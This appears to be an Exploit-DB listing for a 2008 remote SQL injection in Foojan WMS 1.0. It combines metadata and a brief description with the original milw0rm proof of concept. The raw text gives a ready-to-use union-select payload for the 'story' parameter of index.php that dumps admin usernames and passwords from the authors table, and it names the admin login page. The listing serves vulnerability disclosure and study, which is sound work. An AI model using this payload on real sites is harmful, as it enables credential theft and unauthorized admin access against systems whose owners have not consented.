Foojan WMS 1.0 Remote Sql Injection

vendor:

Foojan WMS

by:

IRCRASH (Dr.Crash)

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Foojan WMS

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE: N/A

CPE: a:foojan:foojan_wms:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Foojan WMS 1.0 Remote Sql Injection

A vulnerability exists in Foojan WMS 1.0 which allows an attacker to inject arbitrary SQL commands via the 'story' parameter in the 'index.php' script. An attacker can exploit this vulnerability to gain access to the admin panel by injecting a malicious SQL query in the 'story' parameter. The malicious query will return the username and password of the admin panel.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

#####################################################################################
####                  Foojan WMS 1.0 Remote Sql Injection                        ####
####                              BY IRCRASH                                     ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (Dr.Crash)                                                        #
#                                                                                   #
#Script Download : http://www.iranscripts.com/download/Foojan-WMS1.0%20Full.rar     #
#                                                                                   #
#Injection Adress :  http://Sitename/index.php?story=[SQL CODE]                     #
#                                                                                   #
#                                                                                   #
#[SQL CODE] : 1%27union/**/select/**/0,concat(0x55736572203a20,UserName,0x202b2050617373776f7264203a,PassWord),2,3,4,5,6,7,8/**/from/**/authors/*
#                                                                                   #
#                                                                                   #
#                                                                                   #
#Admin Page For Login is ./admin.php                                                 #
#                                                                                   #
#                        Our site : HTTP://IRCRASH.COM                              #
#                                                                                   #
#####################################################################################

# milw0rm.com [2008-01-23]